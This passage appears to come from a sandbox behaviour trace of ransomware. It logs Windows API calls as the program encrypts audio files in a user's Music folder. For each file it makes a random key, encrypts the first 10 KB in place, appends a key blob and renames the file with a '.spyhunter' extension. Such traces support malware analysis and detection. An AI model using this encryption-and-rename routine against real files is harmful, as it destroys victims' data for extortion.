| out: hHeap=0x2c0000) returned 1 [0147.820] GetProcessHeap () returned 0x2c0000 [0147.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.821] GetProcessHeap () returned 0x2c0000 [0147.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a27d8 | out: hHeap=0x2c0000) returned 1 [0147.821] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ee08 | out: pbBuffer=0x57ee08) returned 1 [0147.821] GetProcessHeap () returned 0x2c0000 [0147.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.821] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ee00*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ee00*=0x30) returned 1 [0147.821] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xLEjxflnKywWsZ0K-M_U.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xlejxflnkywwsz0k-m_u.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.821] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xLEjxflnKywWsZ0K-M_U.wav") returned 64 [0147.821] StrStrW (lpFirst="xLEjxflnKywWsZ0K-M_U.wav", lpSrch=".txt") returned 0x0 [0147.821] GetProcessHeap () returned 0x2c0000 [0147.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.821] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57edc4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57edc4*=0x2800, lpOverlapped=0x0) returned 1 [0147.822] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.822] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57edc4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57edc4*=0x2800, lpOverlapped=0x0) returned 1 [0147.822] GetProcessHeap () returned 0x2c0000 [0147.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.822] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.823] WriteFile (in: hFile=0x178, lpBuffer=0x57ee04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57edc4, lpOverlapped=0x0 | out: lpBuffer=0x57ee04*, lpNumberOfBytesWritten=0x57edc4*=0x4, lpOverlapped=0x0) returned 1 [0147.823] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57edc4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57edc4*=0x30, lpOverlapped=0x0) returned 1 [0147.823] CloseHandle (hObject=0x178) returned 1 [0147.823] GetProcessHeap () returned 0x2c0000 [0147.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0147.823] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xLEjxflnKywWsZ0K-M_U.wav.spyhunter") returned 74 [0147.823] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xLEjxflnKywWsZ0K-M_U.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xlejxflnkywwsz0k-m_u.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xLEjxflnKywWsZ0K-M_U.wav.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xlejxflnkywwsz0k-m_u.wav.spyhunter")) returned 1 [0147.824] GetProcessHeap () returned 0x2c0000 [0147.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0147.824] GetProcessHeap () returned 0x2c0000 [0147.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.824] GetProcessHeap () returned 0x2c0000 [0147.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef62b8 | out: hHeap=0x2c0000) returned 1 [0147.824] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ee00 | out: pbBuffer=0x57ee00) returned 1 [0147.824] GetProcessHeap () returned 0x2c0000 [0147.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.824] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57edf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57edf8*=0x30) returned 1 [0147.824] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XFI34.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xfi34.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.824] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XFI34.wav") returned 49 [0147.824] StrStrW (lpFirst="XFI34.wav", lpSrch=".txt") returned 0x0 [0147.825] GetProcessHeap () returned 0x2c0000 [0147.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.825] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57edbc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57edbc*=0x2800, lpOverlapped=0x0) returned 1 [0147.825] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.825] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57edbc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57edbc*=0x2800, lpOverlapped=0x0) returned 1 [0147.826] GetProcessHeap () returned 0x2c0000 [0147.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.826] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.826] WriteFile (in: hFile=0x178, lpBuffer=0x57edfc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57edbc, lpOverlapped=0x0 | out: lpBuffer=0x57edfc*, lpNumberOfBytesWritten=0x57edbc*=0x4, lpOverlapped=0x0) returned 1 [0147.826] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57edbc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57edbc*=0x30, lpOverlapped=0x0) returned 1 [0147.826] CloseHandle (hObject=0x178) returned 1 [0147.826] GetProcessHeap () returned 0x2c0000 [0147.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0147.826] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XFI34.wav.spyhunter") returned 59 [0147.826] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XFI34.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xfi34.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XFI34.wav.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xfi34.wav.spyhunter")) returned 1 [0147.827] GetProcessHeap () returned 0x2c0000 [0147.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0147.827] GetProcessHeap () returned 0x2c0000 [0147.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.827] GetProcessHeap () returned 0x2c0000 [0147.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebf9b0 | out: hHeap=0x2c0000) returned 1 [0147.827] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ee00 | out: pbBuffer=0x57ee00) returned 1 [0147.827] GetProcessHeap () returned 0x2c0000 [0147.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.827] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57edf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57edf8*=0x30) returned 1 [0147.827] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wbQn.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wbqn.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.828] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wbQn.m4a") returned 48 [0147.828] StrStrW (lpFirst="wbQn.m4a", lpSrch=".txt") returned 0x0 [0147.828] GetProcessHeap () returned 0x2c0000 [0147.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.828] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57edbc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57edbc*=0x2800, lpOverlapped=0x0) returned 1 [0147.829] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.829] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57edbc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57edbc*=0x2800, lpOverlapped=0x0) returned 1 [0147.829] GetProcessHeap () returned 0x2c0000 [0147.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.829] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.829] WriteFile (in: hFile=0x178, lpBuffer=0x57edfc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57edbc, lpOverlapped=0x0 | out: lpBuffer=0x57edfc*, lpNumberOfBytesWritten=0x57edbc*=0x4, lpOverlapped=0x0) returned 1 [0147.829] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57edbc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57edbc*=0x30, lpOverlapped=0x0) returned 1 [0147.829] CloseHandle (hObject=0x178) returned 1 [0147.829] GetProcessHeap () returned 0x2c0000 [0147.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0147.829] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wbQn.m4a.spyhunter") returned 58 [0147.829] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wbQn.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wbqn.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wbQn.m4a.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wbqn.m4a.spyhunter")) returned 1 [0147.830] GetProcessHeap () returned 0x2c0000 [0147.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0147.830] GetProcessHeap () returned 0x2c0000 [0147.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.830] GetProcessHeap () returned 0x2c0000 [0147.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebf900 | out: hHeap=0x2c0000) returned 1 [0147.830] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57edf8 | out: pbBuffer=0x57edf8) returned 1 [0147.830] GetProcessHeap () returned 0x2c0000 [0147.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.830] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57edf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57edf0*=0x30) returned 1 [0147.830] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Vzh6Vk-WaPEuhV.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzh6vk-wapeuhv.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.831] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Vzh6Vk-WaPEuhV.wav") returned 58 [0147.831] StrStrW (lpFirst="Vzh6Vk-WaPEuhV.wav", lpSrch=".txt") returned 0x0 [0147.831] GetProcessHeap () returned 0x2c0000 [0147.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.831] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57edb4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57edb4*=0x1800, lpOverlapped=0x0) returned 1 [0147.832] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffe800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.832] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1800, lpNumberOfBytesWritten=0x57edb4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57edb4*=0x1800, lpOverlapped=0x0) returned 1 [0147.832] GetProcessHeap () returned 0x2c0000 [0147.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.832] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.832] WriteFile (in: hFile=0x178, lpBuffer=0x57edf4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57edb4, lpOverlapped=0x0 | out: lpBuffer=0x57edf4*, lpNumberOfBytesWritten=0x57edb4*=0x4, lpOverlapped=0x0) returned 1 [0147.832] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57edb4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57edb4*=0x30, lpOverlapped=0x0) returned 1 [0147.832] CloseHandle (hObject=0x178) returned 1 [0147.832] GetProcessHeap () returned 0x2c0000 [0147.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0147.832] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Vzh6Vk-WaPEuhV.wav.spyhunter") returned 68 [0147.832] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Vzh6Vk-WaPEuhV.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzh6vk-wapeuhv.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Vzh6Vk-WaPEuhV.wav.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzh6vk-wapeuhv.wav.spyhunter")) returned 1 [0147.833] GetProcessHeap () returned 0x2c0000 [0147.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0147.833] GetProcessHeap () returned 0x2c0000 [0147.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.833] GetProcessHeap () returned 0x2c0000 [0147.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2dcf8 | out: hHeap=0x2c0000) returned 1 [0147.833] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57edf8 | out: pbBuffer=0x57edf8) returned 1 [0147.833] GetProcessHeap () returned 0x2c0000 [0147.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.833] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57edf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57edf0*=0x30) returned 1 [0147.833] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\v5EJo2Q.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\v5ejo2q.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.834] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\v5EJo2Q.mp3") returned 51 [0147.834] StrStrW (lpFirst="v5EJo2Q.mp3", lpSrch=".txt") returned 0x0 [0147.834] GetProcessHeap () returned 0x2c0000 [0147.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.834] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57edb4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57edb4*=0x2800, lpOverlapped=0x0) returned 1 [0147.835] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.835] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57edb4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57edb4*=0x2800, lpOverlapped=0x0) returned 1 [0147.835] GetProcessHeap () returned 0x2c0000 [0147.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.835] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.835] WriteFile (in: hFile=0x178, lpBuffer=0x57edf4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57edb4, lpOverlapped=0x0 | out: lpBuffer=0x57edf4*, lpNumberOfBytesWritten=0x57edb4*=0x4, lpOverlapped=0x0) returned 1 [0147.835] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57edb4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57edb4*=0x30, lpOverlapped=0x0) returned 1 [0147.835] CloseHandle (hObject=0x178) returned 1 [0147.835] GetProcessHeap () returned 0x2c0000 [0147.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0147.835] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\v5EJo2Q.mp3.spyhunter") returned 61 [0147.835] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\v5EJo2Q.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\v5ejo2q.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\v5EJo2Q.mp3.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\v5ejo2q.mp3.spyhunter")) returned 1 [0147.836] GetProcessHeap () returned 0x2c0000 [0147.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0147.836] GetProcessHeap () returned 0x2c0000 [0147.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.836] GetProcessHeap () returned 0x2c0000 [0147.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebf850 | out: hHeap=0x2c0000) returned 1 [0147.836] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57edf0 | out: pbBuffer=0x57edf0) returned 1 [0147.836] GetProcessHeap () returned 0x2c0000 [0147.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.836] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ede8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ede8*=0x30) returned 1 [0147.836] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rtpuK.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rtpuk.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.837] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rtpuK.mp3") returned 49 [0147.837] StrStrW (lpFirst="rtpuK.mp3", lpSrch=".txt") returned 0x0 [0147.837] GetProcessHeap () returned 0x2c0000 [0147.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.837] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57edac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57edac*=0x2800, lpOverlapped=0x0) returned 1 [0147.838] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.838] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57edac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57edac*=0x2800, lpOverlapped=0x0) returned 1 [0147.838] GetProcessHeap () returned 0x2c0000 [0147.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.838] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.838] WriteFile (in: hFile=0x178, lpBuffer=0x57edec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57edac, lpOverlapped=0x0 | out: lpBuffer=0x57edec*, lpNumberOfBytesWritten=0x57edac*=0x4, lpOverlapped=0x0) returned 1 [0147.838] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57edac, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57edac*=0x30, lpOverlapped=0x0) returned 1 [0147.838] CloseHandle (hObject=0x178) returned 1 [0147.838] GetProcessHeap () returned 0x2c0000 [0147.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0147.838] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rtpuK.mp3.spyhunter") returned 59 [0147.839] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rtpuK.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rtpuk.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rtpuK.mp3.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rtpuk.mp3.spyhunter")) returned 1 [0147.839] GetProcessHeap () returned 0x2c0000 [0147.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0147.839] GetProcessHeap () returned 0x2c0000 [0147.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.839] GetProcessHeap () returned 0x2c0000 [0147.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebf7a0 | out: hHeap=0x2c0000) returned 1 [0147.839] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57edf0 | out: pbBuffer=0x57edf0) returned 1 [0147.839] GetProcessHeap () returned 0x2c0000 [0147.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.840] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ede8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ede8*=0x30) returned 1 [0147.840] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\qO_Ig1GAKR_TcFkV.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\qo_ig1gakr_tcfkv.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.840] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\qO_Ig1GAKR_TcFkV.m4a") returned 60 [0147.840] StrStrW (lpFirst="qO_Ig1GAKR_TcFkV.m4a", lpSrch=".txt") returned 0x0 [0147.840] GetProcessHeap () returned 0x2c0000 [0147.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 